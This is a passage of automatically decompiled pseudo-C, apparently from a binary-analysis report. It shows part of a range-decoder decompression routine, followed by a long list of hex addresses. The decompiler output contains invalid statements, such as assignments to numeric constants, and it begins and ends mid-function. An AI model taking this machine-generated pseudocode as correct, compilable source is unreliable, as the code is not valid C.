											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x00406810
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
